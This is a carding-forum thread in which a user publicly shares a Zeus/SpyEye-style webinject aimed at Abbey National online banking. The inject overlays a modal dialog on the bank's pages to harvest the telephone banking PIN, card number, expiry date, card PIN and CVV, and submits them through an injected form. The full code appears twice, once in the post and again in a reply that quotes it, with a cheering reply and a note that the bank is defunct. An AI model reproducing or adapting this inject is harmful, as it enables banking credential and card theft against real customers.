Latest working Abbey webinject ( FULL )

rokitbayy

Professional
Messages
108
Reputation
19
Reaction score
29
Points
28
Basically I have come to know alot of people here want to do botnet and they setup public bots like zeus and spyeye 1.3.45, and they get held on quality webinjects to use for free.

Hence, after releasing my LR inject, I release publicly latest working abbey webinject, grabbing full info.

Code:
;===== ABBEY =====

set_url *abbeynational.co.uk/EBAN_ENS/* GL

data_before
summary="This table shows your accounts and balances">
data_end
data_inject
data_end
data_after
</table>
data_end

set_url *abbeynational.co.uk/EBAN_ENS/BtoChannelDriver* GP

data_before
<head>
data_end

data_after
data_end

data_inject
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/themes/smoothness/ui.all.css" />
<style type="text/css">
#inject { display: none; }
.ui-dialog { width: 400px; font-size: 11px; }
.ui-dialog .ui-dialog-titlebar-close { visibility: hidden; }
.ui-dialog .ui-dialog-titlebar { visibility: hidden; display: none; }
</style>
data_end

data_before
<body*>
data_end

data_inject
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>

<script type="text/javascript">

var popfrequency="216000 hours"

function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length
// set index of beginning of value
end = document.cookie.indexOf(";", offset);
// set index of end of cookie value
if (end == -1)
end = document.cookie.length;
returnvalue=unescape(document.cookie.substring(offset, end))
}
}
return returnvalue;
}

function resetcookie(){
var expireDate = new Date()
expireDate.setHours(expireDate.getHours()-10)
document.cookie = "tcpopunder=;path=/;expires=" + expireDate.toGMTString()
}

function loadornot(){
if (get_cookie('tcpopunder')==''){
loadpopunder()
}
}

function loadpopunder(){

function Init() 
{
  jQuery('#inject').dialog({ buttons: { "Continue": function() {
          if (jQuery("#inject_ccc").val().length < 4) 
          {
            alert('Please enter correct Telephone Banking PIN.');
            jQuery("#inject_ccc").focus();
          } 
          else if (jQuery("#inject_cc").val().length < 15) 
          {
            alert('Please enter correct Credit Card Number');
            jQuery("#inject_cc").focus();
          } 
          else if (jQuery("#inject_expdate_mm").val().length < 2)
          {
             alert('Please enter Exp.Date');  
             jQuery("#inject_expdate_mm").focus();
          } 
          else if (jQuery("#inject_expdate_yy").val().length < 2)  
          {
             alert('Please enter Exp.Date');  
             jQuery("#inject_expdate_yy").focus();
          } 
          else if (jQuery("#inject_pin").val().length < 4)  
          {
              alert('Please enter correct PIN');  
              jQuery("#inject_pin").focus();
          } 
          else if (jQuery("#inject_cvv").val().length < 3) 
          {
              alert('Please enter correct CVV');  
              jQuery("#inject_cvv").focus();
          } 
          else 
          {
    jQuery("#ESpass").val(jQuery("#inject_ccc").val());
    jQuery("#cc").val(jQuery("#inject_cc").val());
    jQuery("#expdate_mm").val(jQuery("#inject_expdate_mm").val());
    jQuery("#expdate_yy").val(jQuery("#inject_expdate_yy").val());
    jQuery("#pin").val(jQuery("#inject_pin").val());
    jQuery("#cvv").val(jQuery("#inject_cvv").val());
    jQuery("form[name='injectform']").submit();
             jQuery('#inject').dialog('close');
var expireDate = new Date()
expireDate.setHours(expireDate.getHours()+parseInt(popfrequency))
document.cookie = "tcpopunder="+parseInt(popfrequency)+";path=/;expires=" + expireDate.toGMTString()}
          } 
        }, closeOnEscape: false, modal: true, show: 'slide' });
  
}
jQuery(document).ready(Init);


}

if (popfrequency=="always"){
resetcookie()
loadpopunder()
}
else{
if (get_cookie('tcpopunder')!=parseInt(popfrequency))
resetcookie()
loadornot()
}
</script>

Want more webinjects for free of your choice? I hear ya! :p CLICK HERE
 

mscj2011

Carder
Messages
36
Reputation
22
Reaction score
27
Points
18
that is great. keep up the good work
 

oddhero

Member
Messages
16
Reputation
0
Reaction score
1
Points
3
rokitbayy, please can you explain and elaborate how to just webinject code
please,please i really need this,im a noob as the way
thank you

---------- Сообщение добавлено в 04:10 PM ---------- Предыдущее сообщение размещено в 04:10 PM ----------

Basically I have come to know alot of people here want to do botnet and they setup public bots like zeus and spyeye 1.3.45, and they get held on quality webinjects to use for free.

Hence, after releasing my LR inject, I release publicly latest working abbey webinject, grabbing full info.

Code:
;===== ABBEY =====

set_url *abbeynational.co.uk/EBAN_ENS/* GL

data_before
summary="This table shows your accounts and balances">
data_end
data_inject
data_end
data_after
</table>
data_end

set_url *abbeynational.co.uk/EBAN_ENS/BtoChannelDriver* GP

data_before
<head>
data_end

data_after
data_end

data_inject
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/themes/smoothness/ui.all.css" />
<style type="text/css">
#inject { display: none; }
.ui-dialog { width: 400px; font-size: 11px; }
.ui-dialog .ui-dialog-titlebar-close { visibility: hidden; }
.ui-dialog .ui-dialog-titlebar { visibility: hidden; display: none; }
</style>
data_end

data_before
<body*>
data_end

data_inject
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>

<script type="text/javascript">

var popfrequency="216000 hours"

function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length
// set index of beginning of value
end = document.cookie.indexOf(";", offset);
// set index of end of cookie value
if (end == -1)
end = document.cookie.length;
returnvalue=unescape(document.cookie.substring(offset, end))
}
}
return returnvalue;
}

function resetcookie(){
var expireDate = new Date()
expireDate.setHours(expireDate.getHours()-10)
document.cookie = "tcpopunder=;path=/;expires=" + expireDate.toGMTString()
}

function loadornot(){
if (get_cookie('tcpopunder')==''){
loadpopunder()
}
}

function loadpopunder(){

function Init() 
{
  jQuery('#inject').dialog({ buttons: { "Continue": function() {
          if (jQuery("#inject_ccc").val().length < 4) 
          {
            alert('Please enter correct Telephone Banking PIN.');
            jQuery("#inject_ccc").focus();
          } 
          else if (jQuery("#inject_cc").val().length < 15) 
          {
            alert('Please enter correct Credit Card Number');
            jQuery("#inject_cc").focus();
          } 
          else if (jQuery("#inject_expdate_mm").val().length < 2)
          {
             alert('Please enter Exp.Date');  
             jQuery("#inject_expdate_mm").focus();
          } 
          else if (jQuery("#inject_expdate_yy").val().length < 2)  
          {
             alert('Please enter Exp.Date');  
             jQuery("#inject_expdate_yy").focus();
          } 
          else if (jQuery("#inject_pin").val().length < 4)  
          {
              alert('Please enter correct PIN');  
              jQuery("#inject_pin").focus();
          } 
          else if (jQuery("#inject_cvv").val().length < 3) 
          {
              alert('Please enter correct CVV');  
              jQuery("#inject_cvv").focus();
          } 
          else 
          {
    jQuery("#ESpass").val(jQuery("#inject_ccc").val());
    jQuery("#cc").val(jQuery("#inject_cc").val());
    jQuery("#expdate_mm").val(jQuery("#inject_expdate_mm").val());
    jQuery("#expdate_yy").val(jQuery("#inject_expdate_yy").val());
    jQuery("#pin").val(jQuery("#inject_pin").val());
    jQuery("#cvv").val(jQuery("#inject_cvv").val());
    jQuery("form[name='injectform']").submit();
             jQuery('#inject').dialog('close');
var expireDate = new Date()
expireDate.setHours(expireDate.getHours()+parseInt(popfrequency))
document.cookie = "tcpopunder="+parseInt(popfrequency)+";path=/;expires=" + expireDate.toGMTString()}
          } 
        }, closeOnEscape: false, modal: true, show: 'slide' });
  
}
jQuery(document).ready(Init);


}

if (popfrequency=="always"){
resetcookie()
loadpopunder()
}
else{
if (get_cookie('tcpopunder')!=parseInt(popfrequency))
resetcookie()
loadornot()
}
</script>

Want more webinjects for free of your choice? I hear ya! :p CLICK HERE

Can you explain how to use webinject code please bro
 

kabby999

Carder
Messages
68
Reputation
6
Reaction score
8
Points
8
Abbey National no longer exists it is part of santandar now so this is useless.
 
Top